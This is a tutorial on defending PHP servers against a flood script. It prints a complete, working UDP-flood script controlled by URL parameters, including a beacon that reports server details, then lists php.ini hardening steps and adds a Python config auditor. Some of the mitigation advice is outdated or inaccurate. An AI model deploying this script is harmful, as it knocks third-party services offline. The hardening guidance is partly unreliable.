PHP solution to DDoS attacks
First, understand DDoS: a Distributed Denial of Service (DDoS) attack uses client/server technology to combine multiple computers into an attack platform that launches DDoS attacks against one or more targets, thus exponentially increasing the power of denial of service attacks. Usually, an attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program communicates with a large number of agent programs that have already been installed on many computers on the network. The agents launch the attack when instructed to do so. Using client/server technology, the master program can activate hundreds or thousands of agents in seconds.
Let's use an analogy to understand what DDoS is.
A group of bullies are trying to prevent the competing store opposite from operating normally. What methods will they use? (This is just an example, do not imitate.) The bullies pretend to be ordinary customers and crowd into their rival's store, refusing to leave, so that real shoppers cannot enter; or they keep chatting with the salespeople so that the staff cannot serve customers normally; they can also give false information to the store operators. After everyone in the store has been kept busy, the store finds that it was all in vain and finally loses its real big customers, resulting in heavy losses. In addition, it is sometimes difficult for bullies to accomplish these bad deeds on their own, so many people have to work together. DoS and DDoS attacks in the field of network security follow the same ideas.
This article mainly introduces the solution to DDoS attacks in PHP. It analyzes the principles of a PHP DDoS attack program and the targeted solutions with examples. It is a very practical skill, and readers who need it can refer to it.
First, look at the source code of the attack script:
<?php set_time_limit(999999); $host = $_GET['host']; $port = $_GET['port']; $exec_time = $_GET['time']; $Sendlen = 65535; $packets = 0; ignore_user_abort(True); if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ if (StrLen($_GET['rat'])<>0){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } echo "Parameters can not be empty!"; exit; } for($i=0;$i<$Sendlen;$i++){ $out .= "A"; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Send Host:$host:$port<br><br>"; echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; ?>
The key code is as follows:
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
The method is very simple: the script sends UDP packets to the target host, and wrapping the send in an infinite loop creates considerable pressure. That pressure falls first on the server that executes the script, because the script consumes a large amount of that server's own network bandwidth, CPU and other resources; for it to put real pressure on a target site, the script would have to be executed on multiple servers. As for the defense: since the script uses fsockopen to make outbound requests, do not let it make them.
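In php.ini, set the following: allow_url_fopen = Off
This setting only governs URL wrappers in file functions such as fopen(); it does not by itself stop fsockopen().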
If the script can still send packets, edit php.ini so that the line
extension=php_sockets.dll
is changed to
;extension=php_sockets.dll
Restart Apache, IIS, or Nginx; this can prevent the PHP DDoS script from sending packets.
In addition, some netizens said that it is very simple to stop the script from being set to never time out:
1. Disable the set_time_limit function.
2. Turn on safe mode (safe_mode=on).
To disable socket functionality, you can either disable the sockets module entirely or disable only the fsockopen function. Since sockets are often used to send password-recovery emails, it is recommended to turn on safe mode directly. However, in this case, the script will time out every 30 seconds. It is estimated that no "hacker" is lonely enough to click to start a DDoS every 30 seconds.
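The php.ini settings described above, checked together by a small Python auditor; this is an added example, not code from the original article. The two sample configurations are constructed, and disable_functions is the php.ini directive assumed here for disabling fsockopen and set_time_limit.

```python
import re

# Functions the article says to block for this script (taken from the page).
BLOCKED_FUNCS = {"fsockopen", "set_time_limit"}

def parse_ini(text):
    """Return (settings dict, list of loaded extensions) from php.ini text."""
    settings, extensions = {}, []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment in php.ini
        if "=" not in line:
            continue                          # blank line or [section] header
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip('"')
        if key.lower() == "extension":
            extensions.append(value.lower())
        else:
            settings[key.lower()] = value     # last assignment wins
    return settings, extensions

def audit(text):
    """List the article's mitigations that this php.ini does not apply."""
    settings, extensions = parse_ini(text)
    findings = []
    # PHP enables allow_url_fopen by default, so a missing line counts as On.
    if settings.get("allow_url_fopen", "1").lower() not in ("off", "0", "false", "no"):
        findings.append("allow_url_fopen is not Off")
    if any(re.fullmatch(r"(php_)?sockets(\.dll|\.so)?", e) for e in extensions):
        findings.append("sockets extension is loaded")
    disabled = {f.strip().lower() for f in settings.get("disable_functions", "").split(",")}
    for func in sorted(BLOCKED_FUNCS - disabled):
        findings.append(f"{func} is not in disable_functions")
    return findings

# Constructed sample configurations (not taken from a real server).
WEAK_INI = """
[PHP]
allow_url_fopen = On
extension=php_sockets.dll
disable_functions =
"""
HARDENED_INI = """
[PHP]
allow_url_fopen = Off
;extension=php_sockets.dll
disable_functions = fsockopen, set_time_limit
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini) or "all of the article's settings applied")
```

safe_mode is not checked because that directive was removed in PHP 5.4; on current versions the script's run time is bounded by max_execution_time once set_time_limit is disabled.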